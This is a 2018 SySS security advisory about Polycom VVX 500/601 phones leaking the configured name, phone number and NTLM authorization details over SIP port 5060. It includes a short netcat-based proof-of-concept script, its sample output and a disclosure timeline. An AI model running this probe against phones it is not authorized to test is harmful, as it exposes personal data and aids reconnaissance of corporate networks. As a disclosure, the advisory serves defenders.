[SYSS-2018-028] information leakage with Polycom VVX Phones (Skype- for Business, on-premise) - CVE-2018-18566

From: Micha Borrmann <micha.borrmann@syss.de>
To: bugtraq@securityfocus.com
Cc:
Subject: [SYSS-2018-028] information leakage with Polycom VVX Phones (Skype- for Business, on-premise) - CVE-2018-18566
Date:


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Advisory ID:               SYSS-2018-028
Product:                   VVX 500 / VVX 601
Manufacturer:              Polycom
Affected Version(s):       <= 5.8.0.12848
Tested Version(s):         5.4.0.10182, 5.8.0.12848
Vulnerability Type:        Information Exposure (CWE-200)
Risk Level:                Low
Solution Status:           Open
Manufacturer Notification: 2018-08-29
Solution Date:             20??-??-??
Public Disclosure:         2018-10-23
CVE Reference:             CVE-2018-18566
Authors of Advisory:       Micha Borrmann (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

If a Polycom VVX 500/601 [1] is used with an on-premise installation
with Skype for Business, the phone leaks the configured phone number
and the name to unauthorized clients via SIP.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The phone has a SIP service running by default on TCP port 5060. This
service can be abused to leak information about the configuration of
the phone.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Script getdatafrompolycom.sh

#!/bin/sh
# Micha Borrmann <micha.borrmann@syss.de>

OWNIP=192.168.100.102

if [ -z "$1" ] 
then
    echo "Please enter an IPv4 address as target"
    exit
else
    TARGET=$1    
fi

echo 'OPTIONS sip:dummy SIP/2.0
Via: SIP/2.0/TCP '$OWNIP':5060
To: <sip:'$OWNIP':5060>
From: <sip:127.0.0.1:5060>
Call-ID: 1
CSeq: 1 OPTIONS
Contact: <sip:127.0.0.1:5060>
Accept: application/sdp
Content-Length: 0
' | recode ..ibmpc | netcat -w 1 $TARGET 5060

Start the script against a phone and see the result:

$ ./getpolycom.sh 192.168.100.101
SIP/2.0 200 OK
Via: SIP/2.0/TCP 192.168.100.102:5060
From: <sip:127.0.0.1:5060>
To: "Micha Borrmann" <sip:192.168.100.102:5060>;tag=F75D6627-FE135FAE
CSeq: 1 OPTIONS
Call-ID: 1
Contact: <sip:micha.borrmann@example.com;opaque=user:epid:XYZ...;abcd>
Allow: INVITE,ACK,BYE,CANCEL,OPTIONS,INFO,MESSAGE,SUBSCRIBE,NOTIFY,PRACK,UPDATE,REFER
Supported: replaces,100rel
User-Agent: Polycom/5.8.0.12848 PolycomVVX-VVX_601-UA/5.8.0.12848
Accept-Language: en
P-Preferred-Identity: "Micha Borrmann" <sip:micha.borrmann@example.com>,<tel:+49XYZ334455661234;ext=1234>
Accept: application/sdp,text/plain,message/sipfrag,application/dialog-info+xml
Accept-Encoding: identity
Supported: 100rel,replaces,norefersub,sdp-anat
Authorization: NTLM qop="auth", realm="SIP Communications Service", opaque="1234CAFE", crand="cafe1234", cnum="11", targetname="server.example.com", response="0000000000000000000000000001"
Content-Length: 0

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install the new firmware which has disabled the SIP service by default.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2018-08-13: Detection of the vulnerability
2018-08-29: Vulnerability reported to manufacturer
2018-10-22: CVE number assigned
2018-10-23: Public release of the security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:
[1] Product web sites for the phones
    https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx500.html
    https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx601.html
[2] SySS Security Advisory SYSS-2018-028
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-028.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Micha Borrmann of SySS GmbH.

E-Mail: micha.borrmann (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Micha_Borrmann.asc
Key Fingerprint: F2E7 C6A5 9950 84ED 7AD6  0DD4 EDBE 26E7 14EA 5876

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory
may be updated in order to provide as accurate information as
possible. The latest version of this security advisory is available on
the SySS Web site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEE8ufGpZlQhO161g3U7b4m5xTqWHYFAlvO5bkACgkQ7b4m5xTq
WHZWBg//eaZW/155/oKVQ5bH8jZ8bPpfe2mbETZ1xU4df60IG16g8/Tz61TEcAu7
N9q3XtdR389shVEG+EQ2Fg9EA5loVX1MMAT3YvaITJbMoRSmX53Sa68mUaPBMWAl
KZQKJD0kFlywsPL25BUQoJVVjvV+y3X45opRQ6u+wf4j5zdrS381CXG1zo4i5YWz
ENHv8uKrcgfTkGpejb61+dAH3K4VssjDNES3kvv1EfCQzOPY8TfTOGQ4MrRPwnZo
p2cfNjIUwKfkqEbNVA/WSiSNOSM12H9DgxzzZI/QxRS76d2pNtWBARVwxArS/DPK
A/lyFswBBCP2timeq+94FC0pXSfCNZazgD4O/pcLXVMis3FiTiJOdRyVrX8pYdr+
Pe+qsve/m+r0fO6dmOimIzx7I/GIT6ARYqJ5cbXdtDDGKAUpNjKixZxjPnBjWst4
tuVHn6PINzPmvGxBcZu4i8VxUPsTXMl992xz/3JDNtIy6sklfwhAN1wdJqLjB4yW
XkirVDdS1aTkLyrs+P19XGDwq+aE19K0PksA1aglv5Ha3VxJWqiaYVOSeFpE+/Ur
jpzNmDtbr8FTq9G1JYgstcCvEv325gd11zvCMsG23cgIBLFqi8r7VWqXGuABPI/b
/upHU1fv2sZe8PHexfFuyO7f0w1LGDrcL+IXoLyDKRVNc3joC7c=
=dxlv
-----END PGP SIGNATURE-----





Copyright © 1995-2018 LinuxRocket.net. All rights reserved.